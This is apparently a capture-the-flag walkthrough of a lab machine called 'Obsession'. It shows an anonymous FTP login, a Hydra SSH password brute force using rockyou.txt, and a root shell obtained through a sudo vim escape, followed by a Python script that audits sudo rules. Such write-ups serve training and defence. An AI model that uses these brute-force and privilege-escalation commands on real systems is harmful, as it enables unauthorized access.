Obsession
export TARGET_IP=172.17.0.2
nmap -p0- $TARGET_IP
| Port | State | Service |
|---|---|---|
| 21/tcp | open | FTP |
| 22/tcp | open | SSH |
| 80/tcp | open | HTTP |
FTP Service
Anonymous Login
A common misconfiguration in FTP servers is allowing anonymous access. An attempt was made to log in using anonymous credentials.
ftp $TARGET_IP
Credentials:
- Username: anonymous
- Password: (blank)
Result: The anonymous login was successful, granting access to the FTP server.
File Discovery and Retrieval
The ls command was used to list the contents of the accessible directory.
ftp> ls
Output:
-rw-r--r-- 1 0 0 667 Jun 18 2024 chat-gonza.txt
-rw-r--r-- 1 0 0 315 Jun 18 2024 pendientes.txt
Two files, chat-gonza.txt and pendientes.txt, were discovered and subsequently downloaded using the get command.
ftp> get chat-gonza.txt
ftp> get pendientes.txt
Content Analysis
The retrieved files were analyzed for sensitive information.
cat chat-gonza.txt pendientes.txt
Content Summary:
- chat-gonza.txt: A chat log between two users, "Gonza" and "Russoski," discussing a video hosted on a secure location within Russoski's computer and mentioning a gym session.
- pendientes.txt: A to-do list containing tasks related to a certification, online services, a vulnerable lab project, and security configurations.
Inferred Information: Potential usernames: gonza and russoski. Browsing the web page at http://172.17.0.2/ and doing some basic investigation suggests that Russoski could be behind it.
SSH Brute-Force
Based on the discovered username russoski and the common password list rockyou.txt, a brute-force attack was launched against the SSH service using Hydra.
hydra -l "russoski" -P /usr/share/wordlists/rockyou.txt ssh://$TARGET_IP -f
Result: The attack successfully identified the password iloveme for the user russoski.
Privilege Escalation
Using the obtained credentials, a successful SSH connection was established.
ssh russoski@$TARGET_IP
The sudo -l command revealed that the user russoski could execute vim as root without a password.
sudo -l
Output:
Matching Defaults entries for russoski on 96d1d89bd82e:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User russoski may run the following commands on 96d1d89bd82e:
(root) NOPASSWD: /usr/bin/vim
Exploiting Vim for Root Shell
Leveraging the GTFOBins resource (https://gtfobins.github.io/gtfobins/vim/#sudo), a root shell was obtained by executing Vim with a specific command.
sudo vim -c ':!/bin/sh'
id
Result: Successful privilege escalation to root, confirmed by the id command output: uid=0(root) gid=0(root) groups=0(root).
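From the defender's side, the sudo rule shown above can be caught in an audit before anyone uses it. The following is an added example, not part of the original write-up: it parses `sudo -l` output and flags root-capable rules for programs that can spawn a shell. The `SHELL_ESCAPE` list, the function name and the hardened sample are assumptions made for illustration.

```python
import re

# Constructed subset of programs that GTFOBins documents as able to spawn a
# shell when run through sudo; extend it from your own baseline.
SHELL_ESCAPE = {"vim", "vi", "less", "more", "man", "find", "awk", "nano"}

# One rule line of `sudo -l`: "(runas) TAG: TAG: command[, command...]"
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

def audit_sudo_l(text):
    """Return one finding per root-capable rule that hands out a shell."""
    findings = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # header and Defaults lines carry no rule
        tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
        users = [u.strip() for u in m["runas"].split(":")[0].split(",")]
        if not any(u in ("root", "ALL") for u in users):
            continue
        for cmd in m["cmds"].split(", "):
            path = cmd.split()[0]
            name = path.rsplit("/", 1)[-1]
            if path == "ALL":
                reasons = ["any command allowed"]
            elif name in SHELL_ESCAPE and "NOEXEC" not in tags:
                reasons = [f"{name} can spawn a shell and NOEXEC is not set"]
            else:
                continue
            if "NOPASSWD" in tags:
                reasons.append("no password required")
            findings.append({"command": path, "reasons": reasons})
    return findings

# `sudo -l` output as shown in the write-up.
PAGE_OUTPUT = r"""Matching Defaults entries for russoski on 96d1d89bd82e:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User russoski may run the following commands on 96d1d89bd82e:
    (root) NOPASSWD: /usr/bin/vim
"""
# Constructed: the same editing need met with sudoedit (file path is hypothetical).
HARDENED_OUTPUT = "User russoski may run the following commands on host:\n    (root) sudoedit /etc/motd\n"

if __name__ == "__main__":
    for f in audit_sudo_l(PAGE_OUTPUT):
        print(f["command"], "->", "; ".join(f["reasons"]))
```

Granting `sudoedit` on the specific files a user must change, instead of a full editor, removes the finding because the editor then runs as the invoking user.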